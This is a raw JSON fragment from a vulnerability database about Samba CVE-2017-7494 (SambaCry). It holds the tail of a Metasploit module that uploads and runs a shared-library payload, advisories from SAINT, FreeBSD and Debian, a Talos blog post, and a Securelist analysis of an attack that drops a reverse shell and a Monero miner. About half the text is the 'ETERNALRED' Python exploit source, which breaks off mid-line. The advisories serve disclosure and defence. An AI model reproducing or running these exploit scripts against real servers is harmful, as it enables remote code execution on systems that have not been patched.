Upload the shared library payload\r\n upload_payload\r\n\r\n # Find and execute the payload from the share\r\n begin\r\n find_payload\r\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply\r\n end\r\n\r\n # Cleanup the payload\r\n begin\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n uploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\r\n simple.delete(uploaded_path)\r\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply\r\n end\r\n\r\n # Shutdown\r\n disconnect\r\n end\r\n\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42084/"}], "saint": [{"lastseen": "2019-05-29T19:19:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "edition": 2, "description": "Added: 06/08/2017 \nCVE: [CVE-2017-7494](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494>) \nBID: [98636](<http://www.securityfocus.com/bid/98636>) \n\n\n### Background\n\n[Samba](<http://www.samba.org>) is a software package which implements the SMB protocol on a variety of platforms, providing compatibility with Windows systems. \n\n### Problem\n\nA vulnerability in Samba allows a remote attacker to upload a shared object library to a writable share, and then cause the server to load and execute it. \n\n### Resolution\n\n[Upgrade](<https://www.samba.org/samba/download/>) to Samba 4.4.14, 4.5.10, or 4.6.4 or higher, or install an updated package from your Linux vendor. \n\n### References\n\n<https://www.samba.org/samba/security/CVE-2017-7494.html> \n\n\n### Limitations\n\nExploit works against Ubuntu 14.04 and requires the login and password of an account with write access to a Samba share on the target unless an anonymously writable share exists. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2017-06-08T00:00:00", "published": "2017-06-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/samba_shared_library_upload", "id": "SAINT:3579A721D51A069C725493EA48A26E42", "title": "Samba shared library upload and execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "\nThe samba project reports:\n\nRemote code execution from a writable share.\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\n\t code execution vulnerability, allowing a malicious client to upload\n\t a shared library to a writable share, and then cause the server to\n\t load and execute it.\n\n", "edition": 5, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/6f4d96c0-4062-11e7-b291-b499baebfeaf.html", "title": "samba -- remote code execution vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-06-30T15:02:29", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<h3>Overview</h3><div><div>Today, a new vulnerability affecting the widely used Samba software was released. Samba is the SMB/CIFS protocol commonly used in *NIX operating systems. <a href=\"https://www.samba.org/samba/security/CVE-2017-7494.html\">CVE-2017-7494</a> has the potential to impact many systems around the world. This vulnerability could allow a user to upload a shared library to a writeable share on a vulnerable Samba server and result in the server executing the uploaded file. &nbsp;This would allow an attacker to upload an exploit payload to a writeable Samba share, resulting in code execution on any server running an affected version of the Samba package. &nbsp;This currently affects all versions of Samba 3.5.0 (released March of 2010) and later. To emphasize the severity and low complexity: a metasploit one-liner can be used to trigger this vulnerability.</div><div><br /></div><div>A patch has already been released to address the issue. &nbsp;Additionally, there is a mitigation available within the configuration of Samba itself. Adding the argument \"nt pipe support = no\" to the global section of the smb.conf file and restarting the service will also mitigate the threat. &nbsp;This threat is only beginning to be recognized by potential attackers with POC code having already been released on the Internet. It is only a matter of time before adversaries begin to use it more widely to compromise additional systems, both externally and internally.&nbsp;<a name='more'></a></div><div><br /></div><div>This is likely to affect numerous servers, storage devices such as NAS systems, and anything else running the version of Samba that is vulnerable to this attack. Users are urged to contact their vendor to obtain patched firmware or recommendations for addressing this threat. In the meantime the above workaround may help. In accordance with best practices, it is highly recommended that users do not allow direct SMB, Samba, CIFS, NFS, etc. access from the Internet to systems within their network.</div></div><h3>Coverage</h3><div><div>Snort Rule: 43002-43004</div><div><br /></div><div>Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.</div><div><br /></div><div>Additional ways our customers can detect and block this threat are listed below.</div><div><br /></div><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s1600/netsec-only.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"335\" src=\"https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s400/netsec-only.png\" width=\"400\" /></a></div><div>Advanced Malware Protection (<a href=\"https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html\">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.</div><div><br /></div><div><a href=\"https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html\">CWS</a> or <a href=\"https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html\">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.</div><div><br /></div><div>Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.</div><div><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\"><br /></a></div><div><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.</div><div><br /></div><div><a href=\"https://umbrella.cisco.com/\">Umbrella</a> prevents DNS resolution of the domains associated with malicious activity.</div><div><br /></div><div><a href=\"https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html\">Stealthwatch</a> detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.</div></div><div><br /></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=f_tPlpkE8BQ:UmkdzmxxjDE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/f_tPlpkE8BQ\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-05-25T03:31:37", "published": "2017-05-25T00:31:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/f_tPlpkE8BQ/samba-vuln-details.html", "id": "TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9", "title": "Samba Vulnerability: Dancing Its Way to a Network Near You", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:09:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3860-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 24, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nCVE ID : CVE-2017-7494\n\nsteelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.2.14+dfsg-0+deb8u6.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-05-24T07:35:17", "published": "2017-05-24T07:35:17", "id": "DEBIAN:DSA-3860-1:8B793", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00120.html", "title": "[SECURITY] [DSA 3860-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Package : samba\nVersion : 2:3.6.6-6+deb7u13\nCVE ID : CVE-2017-7494\n\nsteelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n2:3.6.6-6+deb7u13.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-05-24T08:11:36", "published": "2017-05-24T08:11:36", "id": "DEBIAN:DLA-951-1:1BAA2", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201705/msg00022.html", "title": "[SECURITY] [DLA 951-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-06-30T15:02:31", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "\n\nNot long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue. The story was about a new vulnerability for *nix-based systems \u2013 EternalRed (aka SambaCry). This vulnerability (CVE-2017-7494) relates to all versions of [Samba](<https://en.wikipedia.org/wiki/Samba>), starting from 3.5.0, which was released in 2010, and was patched only in the latest versions of the package (4.6.4/4.5.10/4.4.14).\n\nOn May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and [WannaCry](<https://securelist.com/78411/wannacry-faq-what-you-need-to-know-today/>). Surprisingly, it was a cryptocurrency mining utility!\n\n## Vulnerability exploitation\n\nIn order to check that an unauthorized user has permissions to write to the network drive, the attackers first try to write a text file, consisting of 8 random symbols. If the attempt is successful they delete the file.\n\n[](<https://securelist.com/files/2017/06/sambacry_01.png>)\n\n_Writing and deleting the text file_\n\nAfter this check, it is time for the exploit's payload (it is assembled as a Samba plugin). After successful exploitation of the vulnerability, this runs with super-user privileges, although first the attackers have to guess the full path to the dropped file with their payload, starting from the root directory of the drive. We can see such attempts in the traffic captured on our honeypot. They are just brute-forcing the most obvious paths (specified in different manuals, etc.), where files can be stored on the drive.\n\n[](<https://securelist.com/files/2017/06/sambacry_02.png>)\n\n_Bruteforcing the path to the payload_\n\nAfter the path to the file is found, it can be loaded and executed in the context of the Samba-server process, using the SambaCry vulnerability. Afterwards the file is deleted in order to hide the traces. From this moment it exists and runs only in the virtual memory.\n\nIn our case two files were uploaded and executed in such a way: **INAebsGB.so** (349d84b3b176bbc9834230351ef3bc2a - Backdoor.Linux.Agent.an) and **cblRWuoCc.so** (2009af3fed2a4704c224694dfc4b31dc - Trojan-Downloader.Linux.EternalMiner.a).\n\n## INAebsGB.so\n\nThis file stores the simplest reverse-shell. It connects to the particular port of the IP-address specified by its owner, giving him remote access to the shell (/bin/sh). As a result, the attackers have an ability to execute remotely any shell-commands. They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim's computer.\n\n[](<https://securelist.com/files/2017/06/sambacry_03.png>)\n\n_Listing of INAebsGB.so_\n\nIt's worth noting that a similar payload can be found in the implementation of the SambaCry exploit in Metasploit.\n\n## cblRWuoCc.so\n\nThe main functionality of this file is to download and execute one of the most popular open-source cryptocurrency mining utilities \u2013 cpuminer (miderd). It is done by the hardcoded shell-command, shown on the screenshot below.\n\n[](<https://securelist.com/files/2017/06/sambacry_04.png>)\n\n_The main functionality of cblRWuoCc.so_\n\nThe file **minerd64_s** (8d8bdb58c5e57c565542040ed1988af9 \u2014 RiskTool.Linux.BitCoinMiner.a) downloaded in such a way is stored in **/tmp/m** on the victim's system.\n\n## Cpuminer and what it actually mines\n\nThe interesting part is that the version of cpuminer used is \"upgraded\", so it can be launched without any parameters to mine currency directly to the hardcoded attackers' wallet. We obviously became interested in this wallet, so we decided to investigate a bit and uncover the balance of the attackers account.\n\nAlong with the attackers' wallet number, the pool address (**xmr.crypto-pool.fr:3333**) can be found in the body of the miner. This pool is created for mining the open-source cryptocurrency \u2013 monero. Using all this data we managed to check out the balance on the attackers' wallet and the full log of transactions. Let's have a look:\n\n[](<https://securelist.com/files/2017/06/sambacry_05.png>)\n\n_Balance of the attackers' account on 08.06.2017_\n\n[](<https://securelist.com/files/2017/06/sambacry_06.png>)\n\n_Log of transactions with all the attackers' cryptocurrency income_\n\nThe mining utility is downloaded from the domain registered on April 29th 2017. According to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th. During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.\n\nConsidering that the world discovered the EternalRed vulnerability only at the end of May, and the attackers had already adopted it, the rate of growth in the number of infected machines has significantly increased. After about a month of mining, the attackers gained 98 XMR, which means they earned about $5,500 according to the currency exchange rate at the time of writing.\n\n## Conclusion\n\nAs a result, the attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers. In addition, through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim's computer with other types of malware.\n\nAt the moment we don't have any information about the actual scale of the attack. However, this is a great reason for system administrators and ordinary Linux users to update their Samba software to the latest version immediately to prevent future problems.", "modified": "2017-06-09T22:07:16", "published": "2017-06-09T22:07:16", "href": "https://securelist.com/sambacry-is-coming/78674/", "id": "SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F", "title": "SambaCry is coming", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-09T17:27:50", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-05-25T00:00:00", "type": "zdt", "title": "Samba 3.5.0 - Remote code execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27836", "id": "1337DAY-ID-27836", "sourceData": "#! /usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <[email\u00a0protected]>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n \r\n \r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n \r\n \r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n \r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n \r\n \r\n def hook_listShares(self):\r\n self._listShares = self.listSharesEx\r\n \r\n def hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n \r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n \r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n \r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n \r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n \r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n \r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n \r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n \r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n \r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n \r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n \r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n \r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n \r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n \r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n \r\n \r\n closeFid(tid, fid)\r\n callback(results)\r\n \r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n \r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n \r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n \r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n \r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n \r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n \r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n \r\n \r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n \r\n messages_history = [ ]\r\n \r\n \r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n \r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n \r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = remaining_len)\r\n \r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n \r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n \r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n \r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n \r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n \r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n \r\n conn = SMBConnectionEx(user, password, \"\", 